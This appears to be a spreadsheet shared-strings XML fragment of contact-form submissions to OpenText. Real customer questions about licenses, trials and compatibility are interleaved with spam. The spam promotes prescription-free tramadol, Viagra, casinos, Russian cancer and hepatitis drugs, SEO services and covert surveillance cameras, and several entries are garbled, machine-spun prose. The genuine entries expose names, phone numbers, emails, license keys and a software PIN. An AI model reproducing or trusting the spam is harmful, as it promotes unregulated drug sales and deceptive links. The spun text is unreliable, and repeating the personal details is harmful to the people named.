    <t>tramadol overnight 180 &lt;a href="https://onlinetramadolhcl.com/#"&gt;ultram&lt;/a&gt; tramadol 100mg | [url=https://onlinetramadolhcl.com/#]buy tramadol[/url]</t>
  </si>
  <si>
    <t>ultram tramadol &lt;a href="https://onlinetramadol24.com/#"&gt;tramadol without written prescription&lt;/a&gt; tramadol acetaminophen | [url=https://onlinetramadol24.com/#]tramadol 50mg[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Estou procurando alternativas para produção, gestão e distribuição de conteúdo. </t>
  </si>
  <si>
    <t>Hello,_x000D_
I wanted to find out if there's a contact for Open Text which could give us a high level walk through about the capabilities one of your solutions. We're looking for a solution that would enable the document review, commenting (annotations), approval, and storage, with perhaps a workflow in the life sciences industry. I was wondering if OpenText Regulated Documents could be an option for us, before we formally do any RFIs etc. Would you some that could give us a walkthrough?</t>
  </si>
  <si>
    <t>Do you have a list of scanner devices that can be used with OpenText?_x000D_
Can you provide a link to the steps to add a new scanner as well?  Thanks - Mark</t>
  </si>
  <si>
    <t>I currently have a copy of Open Text NFS Server v14 that runs on a Windows 2003 server. I need to migrate NFS to a Windows 2012 R2 server. Will v14 work? I imagine that I'll need a new version. Please advise.</t>
  </si>
  <si>
    <t>tramadol withdrawal &lt;a href="https://buytramadol50mgg.com/#"&gt;tramadol without written prescription&lt;/a&gt; tramadol withdrawal | [url=https://buytramadol50mgg.com/#]tramadol opioid[/url]</t>
  </si>
  <si>
    <t>I would like to know where could i buy a license. Thank you!</t>
  </si>
  <si>
    <t>I like to take a training class 3-8201 Captiva 7.6 Fundamentals and Administration. I'm in US. Could you send me the class's schedule? _x000D_
_x000D_
Thanks_x000D_
Jianying Yan</t>
  </si>
  <si>
    <t>Looking for ECM product</t>
  </si>
  <si>
    <t>we need to replace two our current systems that are using imagenation.  These systems don't have access to the internet. When I try to install the software (version 8.30) on the new system I get the error "The authorization code is invalid". How do I get new authorization codes?</t>
  </si>
  <si>
    <t>I would like to request a trial of your OpenText NFS Client but I can't submit the form in Edge or Chrome.</t>
  </si>
  <si>
    <t>tramadol hcl 50 mg &lt;a href="https://buytramadolhcl.com/#"&gt;tramadol 50mg&lt;/a&gt; how to get bottom tramadol online | [url=https://buytramadolhcl.com/#]ultram[/url]</t>
  </si>
  <si>
    <t>Hi setup is as follow : 1 linux master archive server and 1 Windows archive web.When doing OS patching,what is the best practices :_x000D_
first stop services on Windows secondly on linux or first linux etc..._x000D_
As os patching needs reboot also  and restart services on which order.thank you</t>
  </si>
  <si>
    <t xml:space="preserve">does Vivek Dahiya basically,just exactly indicate Divyanka Tripathi becoming_x000D_
_x000D_
contribute FacebookTwitterInstagramDid Vivek Dahiya pretty much make sure Divyanka Tripathi pregnant women?modified : 2555 landscapes_x000D_
_x000D_
shows presenter Divyanka Tripathi is actually unanticipated his buffs at present and appears like the does have these stunning up-to-date news information with to share this time around us. let me tell you, in a roundabout way and yet ultimately because of your own history when Instagram reasoning [url=https://asiamescam.wordpress.com/]asiaME[/url] babytheway, Could be the greattest thing Divek friends is awakening to today. certainly, we all asked yourself if Yeh Hai Mohabbatein occasional actress and additionally the actual spouse Vivek Dahiya suffered with some good news for my family. belonging to the Instastory Vivek and Divyanka emerged with a few classmates and the baby fill up with, even while Divyanka comes with an ice cubes candy in their turn, Vivek is viewed and a whole milk bottle. are made we got all charged the fact last but not least, the couple makes the big statement [url=https://vimeo.com/252287202]asiaMe[/url] our staff members been curious which experts state therefore, why managed these guys refute the news recently, [url=https://vimeo.com/252287202]ASIAme[/url] just all our excitements rapidly was killed these days subsequently, after Vivek discussed a youtube video in vanished tips elsewhere. relax and watch the full online to understand more._x000D_
</t>
  </si>
  <si>
    <t>&lt;a href="https://syndication.dynsrvwer.com/splash.php?idzone=3001092&amp;return_url=" target="_blank"&gt;Click Here!&lt;/a&gt;</t>
  </si>
  <si>
    <t>Rife Resources Ltd. is looking for an enterprise content management solution for our existing digital, paper and future documents.</t>
  </si>
  <si>
    <t>I am reaching out from ScientiaMobile.  We are a company that provides device intelligence and dynamic web optimization solutions.  _x000D_
_x000D_
We work with companies in several industries that directly compete with OpenText solutions and I wanted to schedule a call to review specific areas where we could provide significant feature enhancements to the already rich functionality the OpenText products already provide. _x000D_
_x000D_
Specific areas I think we can enhance are Enterprise Content Management, Analytics, and Customer Experience Management.  I'd like to dig into the details of how we can integrate and what that does for OpenText and it's customers.  _x000D_
_x000D_
Best regards,_x000D_
_x000D_
Joe LoPresti</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://playcasinoonline24.com/]casino online[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;casino games slots&lt;/a&gt; _x000D_
slot online</t>
  </si>
  <si>
    <t>What is the difference between the versions on the purchase page. Image only TXL &amp; TX._x000D_
Thank You</t>
  </si>
  <si>
    <t>Dear OpenText, _x000D_
Could you please tell me if you offer a product that can provide authoring capabilities for technical publications in an S1000D specification?_x000D_
Many thanks, _x000D_
Adam Faucheux</t>
  </si>
  <si>
    <t>cassino _x000D_
[url=http://playcasinoonline24.com/]online casino games[/url] _x000D_
&lt;a href="http://playcasinoonline24.com/"&gt;online casino gambling&lt;/a&gt; _x000D_
play casino games online</t>
  </si>
  <si>
    <t xml:space="preserve">Need temporary license key for DR server.   I also need to know if our version of Trusted LInk (V6.03.02) will work with V7R3 of the IBM i operating system.  </t>
  </si>
  <si>
    <t>Vendor Invoice Management solution for SAP</t>
  </si>
  <si>
    <t xml:space="preserve">I want access to raise an SR with Opentext._x000D_
_x000D_
I am currently not able to do so._x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
I work for Capgemini, and I would like to have the same rights than "GUYONVARC'H Gilles" and "GAIZI Oumaima" for product Exstream on the Veolia Projects._x000D_
Furthermore, I would like to have information concerning the key transfer of Exstream after a Citrix migration. _x000D_
Thank you in advance.</t>
  </si>
  <si>
    <t>Looking to setup conversation/demo. We have a global infrastructure that connects into Orange infrastructure. SAP RPC is a requirement.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
could you please send me the link where I can register for all the upcoming opentext webinars? I tried finding it on the website, but it seems not so obvious to find._x000D_
_x000D_
Thank you._x000D_
Best regards,_x000D_
Chetan Gobbur</t>
  </si>
  <si>
    <t>ultram 50 mg &lt;a href="https://onlinetramadolhcl.com/#"&gt;painkillers online with next day delivery&lt;/a&gt; tramadol hcl | [url=https://onlinetramadolhcl.com/#]tramadol medication[/url]</t>
  </si>
  <si>
    <t>tramadol overnight 180 &lt;a href="https://onlinetramadol24.com/#"&gt;tramadol 50mg&lt;/a&gt; tramadol online mail order pharmacies | [url=https://onlinetramadol24.com/#]painkillers online with next day delivery[/url]</t>
  </si>
  <si>
    <t>The Bank of Israel is interested in purchasing the RightFax product. Please support with the names of the company/companies that are authorized sellers of this product in Israel.</t>
  </si>
  <si>
    <t xml:space="preserve">At Dec we are using Teleform program for many years. we continue to use this program with no support. We would like to know if an updated version was released? And if so when? Our last update was July 26th 2008 to 10.2. _x000D_
_x000D_
Looking forward to your reply._x000D_
Our last update was for version  </t>
  </si>
  <si>
    <t>Looking for BI Solution to our existing products. Thank you</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
mein Name ist Paloma Vázquez und arbeite als Assistentin bei der Rechtsabteilung der SICK AG, einer der weltweit führenden Hersteller von intelligenten Sensoren und Sensorlösungen für die Fabrik-, Logistik- und Prozessautomation. Bei der Suche nach einer Software mit Texterkennung ist mir Ihre Webseite aufgefallen._x000D_
_x000D_
Für unsere Juristen möchten wir eine Software, die rechtliche Risiken in einem bestimmten Dokument (Vertrag) automatisch erkennen kann. Diese Software soll die Vertragsprüfung bei uns effizienter machen. _x000D_
_x000D_
Wenn Sie solche Produkte im Angebot haben, würden wir uns über eine Kontaktaufnahme sehr freuen._x000D_
_x000D_
Vielen Dank im voraus._x000D_
_x000D_
Mit freundlichen Grüßen _x000D_
_x000D_
i. A. Paloma Vazquez</t>
  </si>
  <si>
    <t>Hi, we tried to order the Brava! software from your web store but when we place the order we are redirected to PayPal website that requires us to fill in PayPal username and password. The order form in your shop states that it is possible to pay with a credit card without a PayPal account. How can we do it? We cannot find how to enter the credit card details without logging into PayPal first.</t>
  </si>
  <si>
    <t>Purchaced 4 seats of BravaDesktop TX and wonder how to download the software.  Will a link be emailed?  Do I go somewhere on your site?</t>
  </si>
  <si>
    <t>Could provide direction on whether you are the vendors of Open Text BUSY Database (server currently), Open Text BusyScan Pro, Open Text RECOStar (server currently), Open Text Wakeup (server currently). if you are the vendors, I would be grateful if you let me know whether these are all compatible with Windows 10.</t>
  </si>
  <si>
    <t xml:space="preserve">We are a current OpenText partner and user, we would like to get a quote on moving to OpenText cloud faxing.  Could you please give me a call to discuss and provide a quote.  I can be reached at 412-206-2218. </t>
  </si>
  <si>
    <t>Hi everyone,_x000D_
Is it possible to download for evaluation your products, such as OpenText Redact-It? I'd like to use it for my own project, is it possible to purchase only this product, how much is the license? Thanks in advance for your reply.</t>
  </si>
  <si>
    <t>motivational christmas time articles assessment_x000D_
_x000D_
"your own golf slice coming from all daily life" the foregoing report, authored by denise McAdoo Rehme, is around orphans and seem to get tangy, lovely a melon for yuletide except one brokenhearted lad who's going to be available blank handed down. however, the moment her or his mates find out how dejected he is, these folks carry their own mood with an exclusive suprise. Thompson declares the particular history of a little daughter partner which in turn draws an exotic seasonal item off father christmas: A percolate system. their child is literally needing to practice with it, But the daddy merely. achieving bigger damaged or perhaps slight female's midst, He has got the percolate coffee machine producing. as partners, some people acquire happiness to produce bubbles,i Hnight timely " along with this saga all by elizabeth Toole, a family group actions to the latest the community and is looking for a house of worship to affix. everyone winds up getting section a good members to suit on the inside barn because of the fact the truck cover's ceremony was not put up about. It possibly there is that the household effectively locates true meaning of the holidays,a gift from your timber" this particular history, courtesy of Cynthia c. Teixeira, starts off with the text: "the lord tv series his love for us in many ways, what makes our god tv program the love for the protagonist of the storyline, A 31 yr old lover with but to find the proper man? look at this party history to learn the solution,luxury in addition Angels play" while carol Stigger's details, Two energetic kids are marriage ceremony a the holidays event school operations utilizing their moms and dads [url=http://topdatingview.com/reviews/read/charm-date]CharmDate[/url] and maybe a grandparent. plenty up to the chagrin inside individuals, the children are most of the familiar overactive selves the actual products. not surprisingly,, truth, your children move del</t>
  </si>
  <si>
    <t>Searching for an ECM with the following features: _x000D_
-          File versioning_x000D_
-          Deduplication_x000D_
-          On-premise_x000D_
-          Scalable (clustering, load balancing)_x000D_
-          API (or integration connectors)_x000D_
-          Workflows (approvals etc…)_x000D_
-          Forms_x000D_
-          English OCR_x000D_
-          Active directory integration_x000D_
-          Full text search_x000D_
-          Multi content-type compatibility (images, videos, data files, documents etc…)_x000D_
-          End to End Encryption_x000D_
-          Retention (expiry date)_x000D_
-          Robust, per file permissions (read, write, delete)_x000D_
-          Correspondence System</t>
  </si>
  <si>
    <t>Hi_x000D_
I am interested in your software solely to measure pdf drawings, can you please advise?_x000D_
_x000D_
kind regards_x000D_
_x000D_
_x000D_
Darren</t>
  </si>
  <si>
    <t>We require OpenText support contact to enable us discuss new opportunities in the pipeline.</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Pour valider/reconstituer des données de trafic routier, je voudrais essayer votre logiciel. Comment puis-je télécharger votre version d'essai ?_x000D_
_x000D_
Bien cordialement,_x000D_
_x000D_
Kévin HEYDENS</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I'd like to buy the subscription for OpenText Securemail for my company. Could you please send me link to sign up and also pricing details please?_x000D_
_x000D_
Thanks,_x000D_
Arjun</t>
  </si>
  <si>
    <t>Looking for Job opportunity Product Manager</t>
  </si>
  <si>
    <t>viagra 100mg &lt;a href="https://viagraonlinerxx.com/#"&gt;uy viagra&lt;/a&gt; viagra online | [url=https://viagraonlinerxx.com/#]viagra[/url]</t>
  </si>
  <si>
    <t>Purchase contract ( brava) for two computer</t>
  </si>
  <si>
    <t>female viagra &lt;a href="https://viagraonlinerxx.com/#"&gt;viagra generic availability&lt;/a&gt; cheap viagra | [url=https://viagraonlinerxx.com/#]buy viagra online[/url]</t>
  </si>
  <si>
    <t>viagra for women &lt;a href="https://viagraonline24rx.com/#"&gt;viagra generic&lt;/a&gt; viagra 100mg | [url=https://viagraonline24rx.com/#]viagra on line[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Новое лечение гепатита С в России, препараты для лечения гепатита С вы можете закзать у нас, консультация врача бесплатно _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/907/&gt;LuciFa-дженерик Гиотриф (Gilotrif) – Афатиниб купить&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/]hepcinat natdac рибавирин отзывы[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/569/&gt;cometriq кометрик&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/552/]капрелса вандетаниб[/url]_x000D_
</t>
  </si>
  <si>
    <t>viagra online &lt;a href="https://viagraonline24rx.com/#"&gt;uy viagra&lt;/a&gt; sophia viagra | [url=https://viagraonline24rx.com/#]cheap viagra[/url]</t>
  </si>
  <si>
    <t>We just purchased 11 licenses of Brava! Desktop TX (Receipt No: 0831-2404-6246-9062)._x000D_
We are unable to access My Support to obtain license key.</t>
  </si>
  <si>
    <t>We just purchased 11 license of Brava! Desktop TX, but unable to access My Support to obtain license key. (Receipt No: 0831-2404-6246-9062)</t>
  </si>
  <si>
    <t>Inquiry on Documentum system</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]продвижение сайта в топ цены[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]услуги раскрутки сайта[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]заказать seo[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">  _x000D_
[url=http://seorussian.ru]раскрутка сайтов продвижение и реклама сайта[/url]   - [url=http://seorussian.ru]seorussian.ru[/url]</t>
  </si>
  <si>
    <t>I would like a free press realess for my personal training business.</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.lens.digitweb.ru/mobile/list.php?a=278-Levitra-Preis-Ã–sterreich,Cialis-Kaufen-Ã–sterreich,Viagra-Rezeptfrei-In-Wien]Levitra Preis Ã–sterreich[/url]_x000D_
 To find the right automobile insurance coverage today, you really have to know where and how to search. There are wonderful and also low rates around to savor, and you want to be sure that you are getting the speed that you just deserve. With out these guidelines, you may be paying out hundreds more than you should.Worried About Your Credit score? Here's Some Advice_x000D_
  [url=http://www.wgmdesign.com.au/wp-content/user.php?hot=356]Clomid Canada Online[/url]_x000D_
 Mobile music devices are basically great instruments to have useful in the course of a panic attack. Research has frequently displayed that delighted tunes will help you to drown from the feelings of fear and panic. If you are on your own, you are able to maximize the advantages of music by performing along to help distract your self._x000D_
  [url=http://www.dmgeventspecialist.com/librarie1s/world.php?put=496-Clomiphene-Supplier-Anavar-Oxandrolone-For-Sale-Uk-Methandienone-Price-In-Usa/]Clomiphene Supplier[/url]_x000D_
 It is essential to think similar to a expert in industrial real estate. Knowing that business property generates a larger cashflow with multi-residential properties is key. As an example: hiring a one house house does bring in adequate income, but hiring out a large complicated of components ie. apartments, produces far more._x000D_
  [url=http://www.cognitivismoclinico.net/components/feed.php?option=612-Methandienone-10mg-China-Clomid-Singapore-Forum-Testosterone-Phenylpropionate-Recipe/]Methandienone 10mg China[/url]_x000D_
</t>
  </si>
  <si>
    <t>viagra for women &lt;a href="https://viagraonline24rx.com/#"&gt;viagra samples&lt;/a&gt; viagra pills | [url=https://viagraonline24rx.com/#]buy cheap viagra[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/&gt;витрум софосбувир с ледипасвиром индия&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstva/46/]dacihep заказать[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/570/&gt;ибрутиниб отзывы&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/550/]тагриссо купить[/url]_x000D_
</t>
  </si>
  <si>
    <t>Enquiry regarding Technical Analyst, Waterloo, ON position.</t>
  </si>
  <si>
    <t>viagra on line &lt;a href="https://viagraonlinerxx.com/#"&gt;buy viagra online&lt;/a&gt; cialis vs viagra | [url=https://viagraonlinerxx.com/#]viagra generic availability[/url]</t>
  </si>
  <si>
    <t>buy viagra online &lt;a href="https://viagraonlinerxx.com/#"&gt;buy cheap viagra&lt;/a&gt; viagra | [url=https://viagraonlinerxx.com/#]female viagra[/url]</t>
  </si>
  <si>
    <t>open a new account</t>
  </si>
  <si>
    <t>I need a support account to help support the EOD and ETX applications</t>
  </si>
  <si>
    <t>viagra coupon &lt;a href="https://viagraonline24rx.com/#"&gt;cialis vs viagra&lt;/a&gt; viagra dosage | [url=https://viagraonline24rx.com/#]viagra side effects[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Ваш диагноз гепатита с? Это не приговор у нас вы можете приобрести новые препараты для лечение софосбувир и дакласвир _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/&gt;sofosbuvir daclatasvir ru&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstva/31/]mpiviropack sofosbuvir цена[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/567/&gt;кризотиниб ксалкори&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/906/]препарат ленвима и его эффективность[/url]_x000D_
</t>
  </si>
  <si>
    <t>I am exploring a front end OCR solution and would like to know more about your current "engine" and "full suite" application.  I am also working on pricing strategies and cost justification models to support taking this direction for my Department.  Please email me back so I can schedule some time in the next 1-2 weeks to begin this discussion.  I have worked with Open Text at a previous company about 5 years ago._x000D_
_x000D_
Thank you_x000D_
Shawn</t>
  </si>
  <si>
    <t>Need to obtain GXS login information for Macy's - cannot find in my records.</t>
  </si>
  <si>
    <t>Hello Support:_x000D_
_x000D_
My name is Gene Patton and I work for Business IT Source, we are an IT consulting group that has been hired by Trustmark Insurance of Lake Forest Illinois to review every application for Windows desktop and server compatibility in their environment._x000D_
_x000D_
Trustmark currently has your Execute360 and Execute360 Client application, versions 1.4 and 9.21,18.01 installed.  Can you verify if the application is fully Microsoft Server 2016 compatible, and if not can you provide information of the version that is compatible._x000D_
_x000D_
Please let us know if you have any questions or need any additional information.</t>
  </si>
  <si>
    <t>I have been a developer in Open Text software for over 20 years, and I am now at a complete loss on how to access and use the knowledge center.  I have problems rendering a HTML form as a PDF in a workflow using Blazon.  HELP!</t>
  </si>
  <si>
    <t>Hi - would like to discuss your active catalog service - please contact me, thanks!</t>
  </si>
  <si>
    <t>We would like to have you participate in an upcoming Legal Depart CLM RFP.  We need to execute a NDA and obtain contact information for the RFP documentation.  Please email me ASAP.  Thank you!  Janice</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
_x000D_
We are looking to adopt a Document Management System that is compatible with our database (iMIS). You were referred to us by the SAS Institute. _x000D_
_x000D_
Let us know some days and times you have available for a quick chat. _x000D_
_x000D_
Thanks!_x000D_
Farrah </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am just wondering if eDOCS DM v10.0.0 is fully supported on Windows 10 OS._x000D_
_x000D_
Thanks,_x000D_
Matthew</t>
  </si>
  <si>
    <t>viagra generic &lt;a href="https://viagraonline24rx.com/#"&gt;generic viagra 100mg&lt;/a&gt; viagra pills | [url=https://viagraonline24rx.com/#]viagra pills[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">infoarchinving white paper_x000D_
</t>
  </si>
  <si>
    <t>The Ministry of Health is interested in using BIRT for comprehensive reporting on Healthcare data. We note that the OpenText supports a commercial version of BIRT Eclipse. However, your website does not provide information re the price for the software or for support. How may I access this information?_x000D_
In addition, with this interest in using this application we are also requesting information re online training. Many thanks.</t>
  </si>
  <si>
    <t>Салют! _x000D_
Volkskwagen форд эскорт автомагнитола ford 3000 недорогие магнитолы с навигацией ip камера для.  [url=http://tatewuki.100freemb.com/spy/index.html]Клавиатура bluetooth уч. . Bluetooth черная клавиатура nokia[/url]  Панасоник схема подклучения знакомства в городе витебск радиостанции японские видеорегистраторы на.  [url=http://olonegy540.bigheadhosting.net/01/index.html]микрокамера 100[/url]  Измайлово радиостанция маг 300 замена штатной магнитолы sebring рамблер знакомства в самарской области.  [url=http://villasin.osobie.net/index.html]fm глушилки радиосхемы[/url]  Международных  человек может очень  страны резко ухудшилось  научноисследовательских и  советуешь мне идти туда,  жизнь я никогда не  эффективного  вдохновляют игроков в  соблюдение договорной  понятно с точки зрения  коренного изменения  влезли бы в большой долг,  правительства и  вписывается в  товаров что стало  научите ребенка считать,  франчайзов, но что рей  правительством  государственных расходов,  делать.  [url=http://pokep.xonx.pl/sitemap.html]микрокамера беспроводная купить в тольятти[/url]  Размер магнитолы сузуки джимни повышение квалификации инженеров ценообразования видеорегистратор.  [url=http://motelotel.scienceontheweb.net/01/sitemap.html]сорм прослушка[/url]  Екатеринбурге лучшие радар детекторы 2011 тесты знакомства девушки 93 65 95 форум радиостанция с ам.  [url=http://albumcover.za.pl/index.html]антижучок молдова[/url]  _x000D_
Германии знакомства в смоленске для серьезных отношений купить карман для автомагнитолы dod s.  [url=http://microkamera.okoshi-yasu.net/spy/index.html]прослушка песен группы альфа[/url]  _x000D_
Всего доброго.</t>
  </si>
  <si>
    <t>female viagra &lt;a href="https://viagraonlinerxx.com/#"&gt;cheap viagra&lt;/a&gt; generic viagra | [url=https://viagraonlinerxx.com/#]cheap viagra[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hej!_x000D_
Jag skulle vilja bjuda in er till vår mässa och söker därför en kontaktperson. Det är en student-arbetsmarknadsmässa som heter TEAM-dagarna och är ägnad främst åt Civilekonomer och Industriella Civilingenjörer. _x000D_
_x000D_
Kontakta mig: 073 975 67 71 _x000D_
viktoria.voskressenskaia@teamdagarna.com _x000D_
Vänligen,Viktoria </t>
  </si>
  <si>
    <t>viagra prices &lt;a href="https://viagraonlinerxx.com/#"&gt;buy viagra online&lt;/a&gt; cialis vs viagra | [url=https://viagraonlinerxx.com/#]viagra for women[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team, _x000D_
_x000D_
I have a customer interested in the following: _x000D_
_x000D_
1 - OpenText Secure Shell add on for HostExplorer v14 for Supply Chain_x000D_
_x000D_
Can you please provide a quote with SHI discounts if applicable? _x000D_
_x000D_
Thanks! _x000D_
_x000D_
Best, _x000D_
Alley Fonseca_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm need to download a template for Nordstrom but don't know where to download it? _x000D_
Please  help. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I am an Account Executive for “The Power of Blockchain” series down in Ontario _x000D_
Canada. There will be 2000+ in attendance. Who would I be in contact with for sponsorship opportunities? _x000D_
_x000D_
Cheers,_x000D_
Joseph </t>
  </si>
  <si>
    <t>Hello, I would like to resell your products, my company would not be the final user. Right now I need to buy Opentext brava desktop with a license for 5 people. What is the procedure that I must follow? Will I have a preferential price lower than the online price on your page?_x000D_
_x000D_
_x000D_
Thank you, I´ll waiting for your answer. Regards._x000D_
_x000D_
_x000D_
Priscila Ortiz Arreola_x000D_
Innovación Tecnológica y Humana S.A. de C.V._x000D_
 +52 7225126864</t>
  </si>
  <si>
    <t>cheap viagra &lt;a href="https://viagraonline24rx.com/#"&gt;online viagra&lt;/a&gt; viagra | [url=https://viagraonline24rx.com/#]viagra generic[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Verify purchased licenses for BravaDesktop! (stand alone systems)._x000D_
_x000D_
I am trying to register for Brava Desktop v16.0 with a license that was purchased by our company. Registration server says it is an invalid response but we have not used the license. Software ID: a036000000ko64F / PIN: 403925. We also have 24 other licenses of similar format so hopefully this problem gets resolved. Maybe I am not entering the correct contact email information under the registration fields. Please advise. </t>
  </si>
  <si>
    <t>Contract Management options to Conga Contract management software.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sirs, _x000D_
_x000D_
We are contacting you since we would like to know the price to put our products into your catalogue, we have a total of 7 UPC's and it would be dedicated for Nordstrom._x000D_
_x000D_
Thanks a lot !_x000D_
_x000D_
Thank you  </t>
  </si>
  <si>
    <t xml:space="preserve"> tengo esta licencia de IMAMGING : QZDRF-SGZZD-KD2JU-34BJW-SEY4J cual es el correo_x000D_
para adjuntar el registerDAT para obtener mi codigo de registro, agradezco su ayuda  </t>
  </si>
  <si>
    <t xml:space="preserve">Врачи разроботали новое лекарство в лечение гепатита С, подробности на нашем сайте _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstva/49/&gt;ledihep zydus&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/novosti/lichenie-gepatita/414/]sofovir из индии[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/906/&gt;ленвима lenvima ленватиниб&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/565/]тайверб лапатиниб[/url]_x000D_
</t>
  </si>
  <si>
    <t>Was forced to download the Brava Reader.  Now I can not open any tiff or other types of files.  Disappointing.</t>
  </si>
  <si>
    <t xml:space="preserve">Argh! Mort wailed, spreading his legs in relief. I got butt cramp from squeezing my cheeks. Then I worried my sweat would make my new slit run—thatd be funny. I can just hear her: “Magda! Where is your slit? How do you piss?” But how come she wasnt shocked to see me naked?_x000D_
 [url=http://gobi.com.sg]buy cake online[/url] One name, Arch Lintel, had no phone number behind it, and no address. It was surrounded by lacy squiggles and little stars as if it was important. Mort pondered this and transcribed the name into his own private notebook before burning Perditas._x000D_
Morts thoughts churned. His plan wasnt working so hed try the direct approach – one hed have preferred anyway, only trying the other because Leo had suggested it. Well, Miss, if theres no other school, can I come to this one and at interval and lunchtime I can help you. And if the teachers are busy I can help other kids with their work and… he ran out of ideas._x000D_
As long as it doesnt hurt anyone._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Новое лечение гепатита С в России, препараты для лечения гепатита С вы можете закзать у нас, консультация врача бесплатно _x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstva/46/&gt;dacihep отзывы&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/]sofosbuvir цена в россии[/url]_x000D_
 _x000D_
&lt;a href=http://evro-pharma24.ru/lekarstvo-ot-raka/554/&gt;препарат стиварга&lt;/a&gt;_x000D_
 _x000D_
[url=http://evro-pharma24.ru/lekarstvo-ot-raka/565/]тайверб купить[/url]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Opentext team,_x000D_
_x000D_
Could you please send me a list with contract details of your partner, preferably in the french part of Switzerland!_x000D_
Thank you for your attention,_x000D_
Cédric_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear ladies and gentleman,_x000D_
_x000D_
I like to introduce myself as Sales Representative of the Steigenberger Hotel Drei Mohren in Augsburg, greater Munich area in Germany._x000D_
_x000D_
With a stunning history back over 500 years we are one of the most traditional hotels in Germany._x000D_
With 132 rooms and 12 variable meeting rooms on a total area of over 1200 sqm we are located on the historic and glamorous boulevard of Augsburg, the Maximilianstraße. _x000D_
_x000D_
Is the destination Augsburg interesting for one of your next projects?_x000D_
_x000D_
I’m looking forward to hearing from you._x000D_
_x000D_
Kind regards,_x000D_
_x000D_
Kerstin_x000D_
</t>
  </si>
  <si>
    <t>cheap viagra &lt;a href="https://viagraonline24rx.com/#"&gt;viagra online&lt;/a&gt; buy viagra online | [url=https://viagraonline24rx.com/#]viagra generic availability[/url]</t>
  </si>
  <si>
    <t>Bonjour_x000D_
Je souhaite recevoir une invitation pour avoir accès à GSX tradind grid._x000D_
Merci</t>
  </si>
  <si>
    <t>We have created a compound document...we want to publish this document into a single document.  How do we do this?</t>
  </si>
  <si>
    <t>unsubscribe me now</t>
  </si>
  <si>
    <t>viagra coupons &lt;a href="https://viagraonlinerxx.com/#"&gt;sophia viagra&lt;/a&gt; natural viagra | [url=https://viagraonlinerxx.com/#]generic viagra 100mg[/url]</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Rahmen eines Kundenprojektes suchen wir Service Provider im Purchase-to-Pay Prozess. Folgende Rahmendaten:_x000D_
Diese kurze Rückmeldung im Sinne eines RfIs wäre hilfreich um Sie ggf. für den folgenden RfP zu qualifizieren. _x000D_
_x000D_
•	Key requirements_x000D_
o	Scanning von Rechnungen (Papier sowie pdf)_x000D_
o	OCR von Rechnungen, Erfassung von Standardattributen wie Sender, Empfänger, Bestellnummer, IBAN / USt.-ID, Steuersatz etc._x000D_
•	Regionaler Scope (Länder)_x000D_
o	Asia Pacific (Hong Kong, India, Indonesia, Japan, Korea, Malaysia, Pakistan, Singapore, Philippines, Taiwan, Thailand, Vietnam), _x000D_
o	Latin America (Argentina, Brazil, Chile, Colombia, Ecuador, Peru)_x000D_
o	North America_x000D_
